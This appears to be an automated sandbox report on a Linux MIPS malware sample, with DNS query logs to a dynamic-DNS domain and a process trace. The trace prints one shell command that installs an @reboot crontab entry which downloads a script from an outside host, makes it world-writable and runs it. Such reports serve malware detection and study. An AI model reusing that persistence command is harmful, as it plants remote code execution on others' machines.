                                                                                          Nov 17, 2024 04:42:20.408404112 CET192.168.2.23139.84.165.1760x6961Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:21.866657019 CET192.168.2.23139.84.165.1760x6961Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:25.415851116 CET192.168.2.2370.34.254.190x5c03Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:26.869582891 CET192.168.2.2370.34.254.190x5c03Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:30.422538042 CET192.168.2.2365.21.1.1060xce3eStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:30.451415062 CET192.168.2.23168.235.111.720x2ff1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:31.875534058 CET192.168.2.2365.21.1.1060xce3eStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:31.903132915 CET192.168.2.23168.235.111.720x2ff1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:36.609117985 CET192.168.2.2380.152.203.1340x103dStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:45.485991955 CET192.168.2.2380.152.203.1340x103dStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:50.546200037 CET192.168.2.23217.160.70.420x5339Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:56.545763969 CET192.168.2.23139.84.165.1760xdccfStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:42:59.717015982 CET192.168.2.23217.160.70.420x5339Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:01.551654100 CET192.168.2.23194.36.144.870xd1f2Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:01.563513041 CET192.168.2.2370.34.254.190xb2e1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:05.741280079 CET192.168.2.23139.84.165.1760xdccfStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:06.569294930 CET192.168.2.23152.53.15.1270x1916Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:10.743099928 CET192.168.2.23194.36.144.870xd1f2Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:10.754698992 CET192.168.2.2370.34.254.190xb2e1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:12.556917906 CET192.168.2.235.161.109.230xedc6Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:15.760142088 CET192.168.2.23152.53.15.1270x1916Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:17.563357115 CET192.168.2.2365.21.1.1060x7ca0Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:17.592334032 CET192.168.2.23202.61.197.1220xc11Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:21.777815104 CET192.168.2.235.161.109.230xedc6Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:23.958432913 CET192.168.2.23217.160.70.420x5cfeStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:26.781958103 CET192.168.2.2365.21.1.1060x7ca0Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:26.810915947 CET192.168.2.23202.61.197.1220xc11Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:32.831202030 CET192.168.2.23217.160.70.420x5cfeStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:37.487236977 CET192.168.2.23152.53.15.1270x4737Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:37.500428915 CET192.168.2.23202.61.197.1220xa74aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:46.345294952 CET192.168.2.23152.53.15.1270x4737Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:46.358374119 CET192.168.2.23202.61.197.1220xa74aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:51.000273943 CET192.168.2.23168.235.111.720x8e55Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:51.971251011 CET192.168.2.23168.235.111.720x8e55Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:57.189724922 CET192.168.2.2365.21.1.1060xccfbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:57.218456030 CET192.168.2.23194.36.144.870xd744Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:57.230621099 CET192.168.2.23202.61.197.1220xd973Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:58.438764095 CET192.168.2.2365.21.1.1060xccfbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:58.467087030 CET192.168.2.23194.36.144.870xd744Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                          Nov 17, 2024 04:43:58.479561090 CET192.168.2.23202.61.197.1220xd973Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false

                                                                                          System Behavior

                                                                                          Start time (UTC):03:41:53
                                                                                          Start date (UTC):17/11/2024
                                                                                          Path:/tmp/hmips.elf
                                                                                          Arguments:/tmp/hmips.elf
                                                                                          File size:5777432 bytes
                                                                                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                                          Start time (UTC):03:41:53
                                                                                          Start date (UTC):17/11/2024
                                                                                          Path:/tmp/hmips.elf
                                                                                          Arguments:-
                                                                                          File size:5777432 bytes
                                                                                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                                          Start time (UTC):03:41:53
                                                                                          Start date (UTC):17/11/2024
                                                                                          Path:/bin/sh
                                                                                          Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                                                          File size:129816 bytes
                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                          Start time (UTC):03:41:53
                                                                                          Start date (UTC):17/11/2024
                                                                                          Path:/bin/sh
                                                                                          Arguments:-
                                                                                          File size:129816 bytes
                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                          Start time (UTC):03:41:53
                                                                                          Start date (UTC):17/11/2024
                                                                                          Path:/bin/sh
                                                                                          Arguments:-
                                                                                          File size:129816 bytes
                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                          Start time (UTC):03:41:53
                                                                                          Start date (UTC):17/11/2024
                                                                                          Path:/usr/bin/crontab
                                                                                          Arguments:crontab -l
                                                                                          File size:43720 bytes
                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                          Start time (UTC):03:41:53
                                                                                          Start date (UTC):17/11/2024
                                                                                          Path:/bin/sh
                                                                                          Arguments:-
                                                                                          File size:129816 bytes
                                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                          Start time (UTC):03:41:53
                                                                                          Start date (UTC):17/11/2024
                                                                                          Path:/usr/bin/crontab
                                                                                          Arguments:crontab -
                                                                                          File size:43720 bytes
                                                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                                          Start time (UTC):03:41:53
                                                                                          Start date (UTC):17/11/2024
                                                                                          Path:/tmp/hmips.elf
                                                                                          Arguments:-
                                                                                          File size:5777432 bytes
                                                                                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                                          Start time (UTC):03:41:53
                                                                                          Start date (UTC):17/11/2024
                                                                                          Path:/tmp/hmips.elf
                                                                                          Arguments:-
                                                                                          File size:5777432 bytes
                                                                                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                                          Start time (UTC):03:41:53
                                                                                          Start date (UTC):17/11/2024
                                                                                          Path:/tmp/hmips.elf
                                                                                          Arguments:-
                                                                                          File size:5777432 bytes
                                                                                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c